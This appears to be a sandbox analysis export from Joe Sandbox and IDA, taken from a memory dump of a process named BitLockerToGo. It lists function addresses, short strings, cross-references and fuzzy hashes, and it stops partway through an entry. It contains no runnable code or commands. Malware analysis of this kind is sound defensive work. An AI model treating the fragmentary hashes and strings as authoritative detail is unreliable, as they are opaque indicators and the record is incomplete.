Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$EZ[X
API String ID: 0-3834568995
Opcode ID: 763d180905bb05605fc1896acef61b741db4f7e970c3fa62707bbfd3df558641
Instruction ID: 257e7363db9863eed35c8042beb4756b5d4f7fec3451e8c0a26a9ed4e4a865ed
Opcode Fuzzy Hash: 763d180905bb05605fc1896acef61b741db4f7e970c3fa62707bbfd3df558641
Instruction Fuzzy Hash: 2F51C475A083009BC7159A18C8A0B3EB7E6FBC5754F198A2CE9E9A7291D731AC11CBD1

Function 029AAE70 Relevance: 2.6, Strings: 2, Instructions: 102COMMON

Download Yara Rule

Strings

@, xrefs: 029AAED8
;:54, xrefs: 029AAF23, 029AAF2B

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: ;:54$@
API String ID: 2994545307-1464668931
Opcode ID: c8cc28729e23d3380e99dc7ae1c36d664426d2cf8cb28133d1ff6257923c320f
Instruction ID: 043d5fefc391cdf828fad03e5e5a2a423b708bce793d3e42eba4ef86ee0e5492
Opcode Fuzzy Hash: c8cc28729e23d3380e99dc7ae1c36d664426d2cf8cb28133d1ff6257923c320f
Instruction Fuzzy Hash: D3317AB29083049BC314DF55D890A2BF7FAFFD9318F14992DE98897290D335D918CBA6

Function 02973F86 Relevance: 2.0, Strings: 1, Instructions: 755COMMON

Download Yara Rule

Strings

+=, xrefs: 02974ACC

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: +=
API String ID: 0-1874961287
Opcode ID: aa2a7c8380a254f8e541b1458d86475e00c1d42fd475734ddfa7ca1f8cdb3020
Instruction ID: a23f7342c99999c7e0bf9db3d3fb0fe8eaeba46b4d3deefca962c4e324e03251
Opcode Fuzzy Hash: aa2a7c8380a254f8e541b1458d86475e00c1d42fd475734ddfa7ca1f8cdb3020
Instruction Fuzzy Hash: BF32AAB5908381DBD705DF64D884B6BBBF9AF86344F08182DE48A93252E771D944CB92

Function 02965360 Relevance: 1.8, Strings: 1, Instructions: 545COMMON

Download Yara Rule

Strings

%1.17g, xrefs: 0296560F

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: %1.17g
API String ID: 0-1551345525
Opcode ID: fb87c732143987eeacb99c96603093b6270f44e55fbc56557e819c1966b1c314
Instruction ID: 6d4e87b07cde16f1addf3c3b7327f610f239643d543bee361b5bd0fa13951817
Opcode Fuzzy Hash: fb87c732143987eeacb99c96603093b6270f44e55fbc56557e819c1966b1c314
Instruction Fuzzy Hash: 2B1208B1A08382CBE7258E58C588336BBE6AFE5318F9FC56DD8898B351E771D805C741

Function 02988446 Relevance: 1.8, Strings: 1, Instructions: 503COMMON

Download Yara Rule

Strings

efg`, xrefs: 02988973, 0298897B

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: efg`
API String ID: 0-115929991
Opcode ID: c837d114269f878c4b7701f5f80ff8beeec28f0a94f4fd2ea32f2130881d6587
Instruction ID: 9554eccdbeb39aed2e10c266daeb016e52c252195c0fb94fd7b1847577b29fac
Opcode Fuzzy Hash: c837d114269f878c4b7701f5f80ff8beeec28f0a94f4fd2ea32f2130881d6587
Instruction Fuzzy Hash: 74F1DD75A0D202CFD705DF28E990B2AB3E6FB89304F09887DE98587290D734ED65CB61

Function 029871F0 Relevance: 1.7, APIs: 1, Instructions: 242comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(029AEB80,00000000,00000001,029AEB70), ref: 02987219

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: b16f3c2434ab3c55ffe25b5f85ee1ec1765ad7f7542b6695ce74aa3678537ded
Instruction ID: 0100f3fdcf98d312f6bec7a11c7aabb0fd9402e922b76ae65a16dead055d34e4
Opcode Fuzzy Hash: b16f3c2434ab3c55ffe25b5f85ee1ec1765ad7f7542b6695ce74aa3678537ded
Instruction Fuzzy Hash: B351B4B56403049BDB20ABA4CC96FB7B3B9EF85358F184958F986CB290F375D804C762

Function 029880AF Relevance: 1.6, Strings: 1, Instructions: 354COMMON

Download Yara Rule

Strings

efg`, xrefs: 02988103, 0298810B

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: efg`
API String ID: 0-115929991
Opcode ID: 3ad0736524e6333e88dec4537aee3b43a639328e1b6d4258deb59c9705132b9e
Instruction ID: 333ed49725877ffea0b9c38ff22262e71fb67e0165ada41f3ad061aa79136d85
Opcode Fuzzy Hash: 3ad0736524e6333e88dec4537aee3b43a639328e1b6d4258deb59c9705132b9e
Instruction Fuzzy Hash: 68B124B590C3418FC325DF68C890A2ABBE1FB85304F988D6DE4E58B351D334D844CBA2

Function 029AB280 Relevance: 1.5, Strings: 1, Instructions: 278COMMON

Download Yara Rule

Strings

;:54, xrefs: 029AB2B3, 029AB2BB

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ;:54
API String ID: 0-2887251705
Opcode ID: acb61ffebfa9b4ed0cf5591659c9e8b33f1ec81826b4121082cd071fdc8334ac
Instruction ID: 97db95680ef461ab245a5aea383e7a2c72a92c0f24e191e6f3c616330eafb365
Opcode Fuzzy Hash: acb61ffebfa9b4ed0cf5591659c9e8b33f1ec81826b4121082cd071fdc8334ac
Instruction Fuzzy Hash: A081AD752093019BC725DF68D8B0A2BB7F9FFA9748F05891CE985CB251E731E810CB92

Function 0296A940 Relevance: 1.5, Strings: 1, Instructions: 268COMMON

Download Yara Rule

Strings

,, xrefs: 0296AA76

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 8a6fb73d91190a473f48f88cc53f6b340235e558d81ddececf3063defe079300
Instruction ID: 40e54390f537a75a8566068a0e5eb4a7f827c52455874129d242d92b26a0a6b8
Opcode Fuzzy Hash: 8a6fb73d91190a473f48f88cc53f6b340235e558d81ddececf3063defe079300
Instruction Fuzzy Hash: 6DB15A711083859FC321DF28C98462BFBE1AFA9608F444E2DF5D997342D635E918CBA7

Function 029A5850 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

efg`, xrefs: 029A5A73, 029A5A7B

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: efg`
API String ID: 0-115929991
Opcode ID: ac947206b399d14585fa249cd34e7601d71850e41691f3762f5bc1328daff131
Instruction ID: f6d5d86482530c8e3f39675441d156fd4e07f391af470f298dd20f6bd9533591
Opcode Fuzzy Hash: ac947206b399d14585fa249cd34e7601d71850e41691f3762f5bc1328daff131
Instruction Fuzzy Hash: D071F376B083019FD311DE55C8A0B2AB7EAFBC4324F9A8A1DE5D68B291D731D814CBD1

Function 0297590B Relevance: 1.5, Strings: 1, Instructions: 209COMMON

Download Yara Rule

Strings

2>, xrefs: 02975B0C

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 2>
API String ID: 0-1841847077
Opcode ID: 015e1cfa62c3148b4b214355796a1fc8091c1c6813bbe247b21b2f6043a90986
Instruction ID: aeb2c1fb796aa20259c224272f33e601e42ecbdbb986a91a1449444fb62ed4f5
Opcode Fuzzy Hash: 015e1cfa62c3148b4b214355796a1fc8091c1c6813bbe247b21b2f6043a90986
Instruction Fuzzy Hash: 1161027440C380AAD340DB94D984A1FFBE6AF86749F948C2DF8C897222D375D858DB67

Function 02996A80 Relevance: 1.4, Strings: 1, Instructions: 189COMMON

Download Yara Rule

Strings

0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 02996BF3

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
API String ID: 0-442858466
Opcode ID: ea38027a698e821c909a7d3d776a4b8a4f8659f8e0a97a3e9e1ca41a2ba3088e
Instruction ID: d3bf7aa0b68701e7dd77fbd5c7e530c8ad0a2b83915bfc72bd09669007356b35
Opcode Fuzzy Hash: ea38027a698e821c909a7d3d776a4b8a4f8659f8e0a97a3e9e1ca41a2ba3088e
Instruction Fuzzy Hash: CC510B33A5E5908ADF214D3C4C112B46B5F5FD2374B2D8BAAE9B18B3D5D6268812C391

Function 029A4590 Relevance: 1.4, Strings: 1, Instructions: 172COMMON

Download Yara Rule

Strings

efg`, xrefs: 029A4653, 029A465B

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: efg`
API String ID: 0-115929991
Opcode ID: bf45739d9102c0537886d733220b4e993e6018e2a45e88c5362768bf2b7017a4
Instruction ID: da089ac90f5df50bcab223c29cc263439208a4746dcd9e7468ed46b87eef78ff
Opcode Fuzzy Hash: bf45739d9102c0537886d733220b4e993e6018e2a45e88c5362768bf2b7017a4
Instruction Fuzzy Hash: BC51CF756093409BC724DF58D9A4A2EFBFAEFC9748F04982CE4C997241D771D810CBA2

Function 029AA310 Relevance: 1.4, Strings: 1, Instructions: 158COMMON

Download Yara Rule

Strings

]K, xrefs: 029AA343, 029AA34B

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ]K
API String ID: 0-61035251
Opcode ID: f4b8f55c5c215558af9654e5396e6c45ce218ffd36e0ed623c57802382c5079b
Instruction ID: e1e32fec8c7ed6f2c46ae1515cba8ec412df8ee57e021064ce4f464066246824
Opcode Fuzzy Hash: f4b8f55c5c215558af9654e5396e6c45ce218ffd36e0ed623c57802382c5079b
Instruction Fuzzy Hash: 87518B31A1C240CFC3459F28D99462ABBF2EB8A305F8A8C6DE4C6D7240D735D960CB52

Function 029AAB60 Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

;:54, xrefs: 029AAB94, 029AAB9D

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ;:54
API String ID: 0-2887251705
Opcode ID: 60b97f5606442c5ad958daa99b8ca68c0e678d3ed68941cacd34c01d22395012
Instruction ID: 8f26c382b7bcf0e06dd008b19d0801d2519ea7b48957166a964bae8545b28f34
Opcode Fuzzy Hash: 60b97f5606442c5ad958daa99b8ca68c0e678d3ed68941cacd34c01d22395012
Instruction Fuzzy Hash: 0741BD74608300ABE7259F54D9A0B2FF7FAEF85714F24882CF5899B281D331D850CBA2

Function 029AACF0 Relevance: 1.4, Strings: 1, Instructions: 136COMMON

Download Yara Rule

Strings

;:54, xrefs: 029AAD24, 029AAD2D

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ;:54
API String ID: 0-2887251705
Opcode ID: cc8099ac3c204bfc2373c29a21c5c3c61d6e07b98e0c84a1a6a493f186430406
Instruction ID: c1e7c207a5928cca6abee79973339388cc45649bf80c1d6ea7d1b02a4027057a
Opcode Fuzzy Hash: cc8099ac3c204bfc2373c29a21c5c3c61d6e07b98e0c84a1a6a493f186430406
Instruction Fuzzy Hash: 2A418C74608300ABD7559E54D9A0B2BF7FAEF85714F24881CF5C99B291D331D810CBA6

Function 029A5B00 Relevance: 1.3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

Strings

yfg, xrefs: 029A5B27

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: yfg
API String ID: 0-2416863859
Opcode ID: 5d5d4a49fce154d983ad05d6f049afa41da509ee9ad15731e5b7ca2c39ceeacb
Instruction ID: c67d3ed09514fdb0d2c804254ae45838f35873e75b299c6cc3d2ea43f6d533ea
Opcode Fuzzy Hash: 5d5d4a49fce154d983ad05d6f049afa41da509ee9ad15731e5b7ca2c39ceeacb
Instruction Fuzzy Hash: 161146B1919380AFD341DF25D594A2FBBF9AB86388F986C2CF5C897215D330C450CB56

Function 0296BF70 Relevance: .9, Instructions: 858COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb45b1ee87a413ac6080f351ae42576be2cf282c931bab473a5797136574e79c
Instruction ID: e9629ac3a71e07a915240b93932fbf74544ca03519113db85ba2d8456e508539
Opcode Fuzzy Hash: eb45b1ee87a413ac6080f351ae42576be2cf282c931bab473a5797136574e79c
Instruction Fuzzy Hash: 755206326183118BC725DF18D88867BB3E2FFC4319F198A2EE9D697385D735A811CB46

Function 029673F0 Relevance: .7, Instructions: 687COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf4362c42e2a8a1f7f7c51037d284403c65af91da4638aa2edbf14d444168924
Instruction ID: e67c0aa8668b0b549ac493507fc96b833da393c0b0d91be637bd83e66a9e9519
Opcode Fuzzy Hash: bf4362c42e2a8a1f7f7c51037d284403c65af91da4638aa2edbf14d444168924
Instruction Fuzzy Hash: 3252CF315083458BC715CF68C0946FAFBE2FF88318F198A6DE89A5B351D739D989CB81

Function 0296B460 Relevance: .7, Instructions: 670COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5347647a2f851975e613a19899daa847fc6aeb89ccd82321b26b36644f3a4d10
Instruction ID: f46c6870433fdcb74bb02e47c8996a964988723bbfae365ab2919ff5278c6897
Opcode Fuzzy Hash: 5347647a2f851975e613a19899daa847fc6aeb89ccd82321b26b36644f3a4d10
Instruction Fuzzy Hash: 0152B7B0A087848FE735CB24C4A87B7BBE5EF4131CF14482DC5E697A82E379A585C751

Function 02983770 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47ee111ab2be5fa09e33cef15ca0da4652cdbc9b45586dcf14809064ef2327aa
Instruction ID: 3e3415e20d5f22f4d3f556ad9efb828cf6e732bcf12321890afdda34da9001b8
Opcode Fuzzy Hash: 47ee111ab2be5fa09e33cef15ca0da4652cdbc9b45586dcf14809064ef2327aa
Instruction Fuzzy Hash: 9F7208B0508B818ED332CB3C8848797BFE5AB5A324F184A9DD4FA873D2D7756105CB66

Function 029A97BB Relevance: .6, Instructions: 630COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e061976759a86bb8c55830fea7a625eeff16bdc744e4fad638a1aa13145d7eb
Instruction ID: 12d97e9fd5c1c52cb8753b8674f29170a04ed4f8be2c31dfed5addfb9de29bbd
Opcode Fuzzy Hash: 1e061976759a86bb8c55830fea7a625eeff16bdc744e4fad638a1aa13145d7eb
Instruction Fuzzy Hash: CC12DB75A18311CFD705DF68E5A0A2EB7F5FF8A315F9A886DE58693241C330E820CB91

Function 02967E20 Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7690302336d065bac64d523cf9a188aa12d9fce53cd6965698969d9930e4e552
Instruction ID: f237d813268d330f2757e5a27d228b8abc67eacb23b4934a4b83d0052823bcca
Opcode Fuzzy Hash: 7690302336d065bac64d523cf9a188aa12d9fce53cd6965698969d9930e4e552
Instruction Fuzzy Hash: A5321270514B118FC368CF29C69866ABBF2BF45610B944E2ED6A787F90D776F848CB10

Function 0298CD0C Relevance: .5, Instructions: 507COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2299b3a54d7ed6c3ebe18faa7c00f1f5afe3a86803533dc0193f8a1526881d19
Instruction ID: a940304f6f4275964dcb3a226c121ab6380fb3203b920ef0058b1d5ffec07924
Opcode Fuzzy Hash: 2299b3a54d7ed6c3ebe18faa7c00f1f5afe3a86803533dc0193f8a1526881d19
Instruction Fuzzy Hash: A902D1B4904741CFC724DF29D581A26BBF6EF4A300F18896DD58A8B742D335E856CFA1

Function 029A7BB0 Relevance: .4, Instructions: 436COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d99fd0458330eb7b110eeab6ae59ce8dee289f2d36629a21d83a5055c70d52de
Instruction ID: 79682f85984118bf136a2df9574385e3c97f5c96cc57578ebed2522ac407bf7d
Opcode Fuzzy Hash: d99fd0458330eb7b110eeab6ae59ce8dee289f2d36629a21d83a5055c70d52de
Instruction Fuzzy Hash: B1F10E32A1C342CFC316CF28D49056AF7E2BB89315F5A8AADE4918B391D335D961CB91

Function 0296A480 Relevance: .4, Instructions: 399COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11e6fdcc7b00b20d8216a174cf6fc7849cdc10e6928a692e4ce67fe3e5b518ca
Instruction ID: 0a2c5c16a8a909506c1eb317b9b37ad7ee468c09d578849f64a8ce927a762d4f
Opcode Fuzzy Hash: 11e6fdcc7b00b20d8216a174cf6fc7849cdc10e6928a692e4ce67fe3e5b518ca
Instruction Fuzzy Hash: 08E166712083828FC721DF29C884B2BBBE5EF98204F448C2DE4D997751E775E949CB96

Function 029A8BE0 Relevance: .4, Instructions: 350COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 953e39e9942c127ad3b1bc2d200501e10ec816ab65a068e5c3fcddadfa12f7c1
Instruction ID: 8816101a4d978b1dc184bb0ac9841299d6cc206188e55333f6eeb0d8ac171312
Opcode Fuzzy Hash: 953e39e9942c127ad3b1bc2d200501e10ec816ab65a068e5c3fcddadfa12f7c1
Instruction Fuzzy Hash: F1B1B2B2A083409BE714DE28DC6476FB7EABFC5318F18492DE99597341EB35D8048BD2

Function 02969230 Relevance: .3, Instructions: 344COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1094975bb77c803561768cca7d542676843f009cfb4ebebd1cab451f65a95ebe
Instruction ID: 5317f4da8a8262b94cd23e6a9b92e24fcd016b0291048f152be2df3687893ce7
Opcode Fuzzy Hash: 1094975bb77c803561768cca7d542676843f009cfb4ebebd1cab451f65a95ebe
Instruction Fuzzy Hash: 68D16775A1C202CFE748CF24D5987AB77E1FB88359F09896CE44987281D339DAA5CF81

Function 0297037F Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c02fd4a38926dbcb4b0ceec7ec9ea1590bf660235cca33249412fb3361abfc8a
Instruction ID: 4a18cb0ac009e9e556d521c09eb4393b82bd297e1469de1ed7e16025ba6a4869
Opcode Fuzzy Hash: c02fd4a38926dbcb4b0ceec7ec9ea1590bf660235cca33249412fb3361abfc8a
Instruction Fuzzy Hash: 6CB12071A14B00CFD3298F25D954A27BBF6FF89315F558E2DE89687A80E730F8158B50

Function 029A9C00 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc5fca0449cee6d19ae76820349cd0178065518c0b1982f9f17723b1ffdbac80
Instruction ID: bf747972201c1f69a9a18b970ea14a81a8aafeb6d798b64d92cc5cfb59b301ab
Opcode Fuzzy Hash: dc5fca0449cee6d19ae76820349cd0178065518c0b1982f9f17723b1ffdbac80
Instruction Fuzzy Hash: 4A917A7560C351CFD705DF28E5A092AF7E6FF8A315F9A886DE58583252C331E860CB92

Function 029A9CF0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7a12056f83b8171b6daa59fa251096f9802d16b7fc11e56c411bc55a8ab65b0
Instruction ID: fe22c7c2cb9cdd040780117694c782736e0245f9e91e80c697f4fb8e403d1055
Opcode Fuzzy Hash: d7a12056f83b8171b6daa59fa251096f9802d16b7fc11e56c411bc55a8ab65b0
Instruction Fuzzy Hash: B391897160C240CFD705DF28D5A0A2AFBE6FF9A315F59892DE5C587251D731E820CB92

Function 0296AFD0 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0746e4b4c59deb68c9f701c36701068ac3a354a17e8d1cce2230d6979a1a6fd0
Instruction ID: 18005187d8a5a71caca57ca97e9162138e82f3762d9df25b7d52a51d0c90c1b3
Opcode Fuzzy Hash: 0746e4b4c59deb68c9f701c36701068ac3a354a17e8d1cce2230d6979a1a6fd0
Instruction Fuzzy Hash: 6AC15FB2A087418FC360CF69DC99BABB7E1BF85318F08492DD1D9D6242E778A155CB05

Function 02973C2A Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e841b905505a5397f962d8d687115132362a2fe8d4ecd67eedeb89824a52f76
Instruction ID: 4b6718abdc4c6003cbe30272789e972e04b419acd97ff4cdfc32541ce860e239
Opcode Fuzzy Hash: 9e841b905505a5397f962d8d687115132362a2fe8d4ecd67eedeb89824a52f76
Instruction Fuzzy Hash: 2BA1677951D380ABD3009FA4E995A2FFBEAEF86745F04882DF48883261D775C8549B13

Function 0298E419 Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e567691133e713b1f78a7ba51e7cd03296553f88631dfc760ff8c47878a6cdbf
Instruction ID: 9c5480eaf10b7b20d78e7ca529bb9ec878dc71428659787a0559326a672abe3a
Opcode Fuzzy Hash: e567691133e713b1f78a7ba51e7cd03296553f88631dfc760ff8c47878a6cdbf
Instruction Fuzzy Hash: 85A10731E48295CFDB05CF78D8A076DBBB2BF4A324F1886A8E495673C1D371A954CB50

Function 029AA2AE Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1fcfc9acbc01e619108c59f76206bfc94635b0b58a09992e6450382a679fc17
Instruction ID: da1102c55772103c59635f14b425e6a414af4b299eba720faf6bf00d015e7cbc
Opcode Fuzzy Hash: f1fcfc9acbc01e619108c59f76206bfc94635b0b58a09992e6450382a679fc17
Instruction Fuzzy Hash: 0A81CC31A5C341CFC349DF28E9A062AB7E2FF8A315F89886DE585C7241D735D924CB81

Function 0298E19C Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdcc0fb5cbd91ceb6765398bd4ae9cf88231e27c8ec20e65d9f73f81bcf8d298
